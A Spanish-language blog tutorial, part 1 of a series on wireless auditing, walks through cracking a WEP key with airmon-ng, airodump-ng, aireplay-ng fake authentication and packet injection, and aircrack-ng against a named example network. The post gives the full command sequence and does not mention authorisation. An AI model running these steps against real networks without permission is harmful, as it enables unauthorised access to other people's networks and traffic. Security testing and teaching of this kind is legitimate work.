Auditoria de Redes Wireless WEP Y WPA/WPA2 (Parte 1 de 3)

Se lo que piensan… esto es mas viejo que el hilo negro! 😛 , pero lo cierto es que siempre me preguntan como se realiza la auditoria de redes wireless y creo que es tiempo de hacer un pequeño tutorial al respecto y las nuevas herramientas para hacer este trabajo.

Que necesitamos:

– Backtrack 5 R2

– 1 Tarjeta inalambrica con capacidad de inyección (ver aqui: http://bit.ly/OgWisl) Yo uso una con Chipset Realtek 8187L con una antena bi-direccional de 6DBI y 1000mw (esta misma: http://bit.ly/LGhsQh)

Vamos a hacerlo de 2 formas.. a mano por linea de comandos (como debe ser) y luego para mis Script Kiddies una herramienta grafica mas facil.

Comenzamos: primero debemos parar el servicio DHCP que viene habilitado por defecto en Backtrack 5 en adelante, para eso debemos usar el comando: /etc/init.d/networking stop, luego ver si nuestra tarjeta inalambrica esta conectada: para esto debemos correr el comando: iwconfig y debemos ver algo como esto: wlan0

Paso siguiente es habilitar la tarjeta en modo Monitor con el comando: airmon-ng start wlan0

luego comenzamos a monitorear con el comando: airodump-ng mon0

Lo importante es identificar la red que deseamos romper ubicando el BSSID, ESSID, Canal y Nivel de Cifrado. (Si es WEP o WPA/WPA2)

Luego debemos dejar de escuchar todo y escuchar unicamente la red que deseamos auditar. para esto debemos usar este comando: airodump-ng -c CANAL -w ARCHIVO –bssid MAC-AP-VICTIMA mon0, por ejemplo para la red CasaGarcia debemos usar: airodump-ng -c 1 -w Audit-CasaGarcia –bssid 00:26:ED:84:52:C8 mon0  y aqui tenemos el resultado:

Como ven en la grafica se ven mac de equipos, pero no conectado a la red inalambrica, eso igual nos puede servir y es una debilidad de algunos routers de publicar inalambricamente las mac de los computadores que pasan por la red interna (LAN).

Ahora vamos a inyectar trafico para poder tener mas paquetes y poder romper WEP.

Vamos a comenzar con simular trafico, para esto debemos hacer el siguiente comando: aireplay-ng -1 9 -a MAC-AP-VICTIMA -h FAKE-MAC mon0, que en este caso es: aireplay-ng -1 9 -a 00:26:ED:84:52:C8 -h 11:22:33:44:55:66 mon0 y vemos el resultado que aparece una nueva conexion wireless con nuestra mac Falsa

ahora que tenemos este equipo falso en la red inalambrica vamos a hacer intentos de conexion a la red inalambrica para subir el trafico. para eso debemos usar el comando: aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF –b MAC-AP-VICTIMA –h FAKE-MAC mon0 , para este ejemplo debemos usar:  aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:26:ED:84:52:C8 -h 11:22:33:44:55:66 mon0 y tendran algo como esto: donde les mostrara el paquete que va a inyectar, solo deben darle Y para que comience a inyectar el trafico.

luego para romper el cifrado deben usa el siguiente comando: aircrack-ng –bssid MAC-AP-VICTIMA ARCHIVO.CAP que en este caso seria: aircrack-ng –bssid 00:26:ED:84:52:C8 Audit-CasaGarcia-01.cap y se pondra a trabajar. y tendremos nuestra clave.

Ahora esperamos y voila! tendremos la clave WEP…

Proxima Entrega como hacerlo con WPA/WP2.

Saludos